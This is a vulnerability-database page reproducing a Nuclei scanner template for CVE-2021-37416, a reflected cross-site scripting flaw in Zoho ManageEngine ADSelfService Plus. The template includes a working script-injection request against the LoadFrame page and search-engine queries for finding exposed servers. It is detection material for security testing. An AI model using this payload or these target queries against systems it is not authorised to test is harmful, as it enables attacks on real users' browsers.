Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-37416
HistoryMay 09, 2022 - 9:51 a.m.

Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting

2022-05-0909:51:53
ProjectDiscovery
github.com

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

51.4%

Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.

id: CVE-2021-37416

info:
  name: Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.
  remediation: |
    Upgrade to a patched version of Zoho ManageEngine ADSelfService Plus (version >6103) to mitigate this vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416
    - https://blog.stmcyber.com/vulns/cve-2021-37416/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-37416
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-37416
    cwe-id: CWE-79
    epss-score: 0.00149
    epss-percentile: 0.51001
    cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zohocorp
    product: manageengine_adselfservice_plus
    shodan-query:
      - http.title:"ManageEngine"
      - http.title:"adselfservice plus"
      - http.title:"manageengine"
    fofa-query:
      - title="manageengine"
      - title="adselfservice plus"
    google-query:
      - intitle:"adselfservice plus"
      - intitle:"manageengine"
  tags: cve2021,cve,zoho,xss,zohocorp

http:
  - method: GET
    path:
      - "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        part: body
        words:
          - "></iframe><script>alert(1)</script>"
          - "adsf/js/"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402206f55f780fc5e337c9151fea07edce5c9488316e1c133f7a324972cebb28e6b670220639a6fd8ef3ac12f9a1aed3c26c705f148b4b47f012d014d23b051e7997e32f4:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

51.4%

Related for NUCLEI:CVE-2021-37416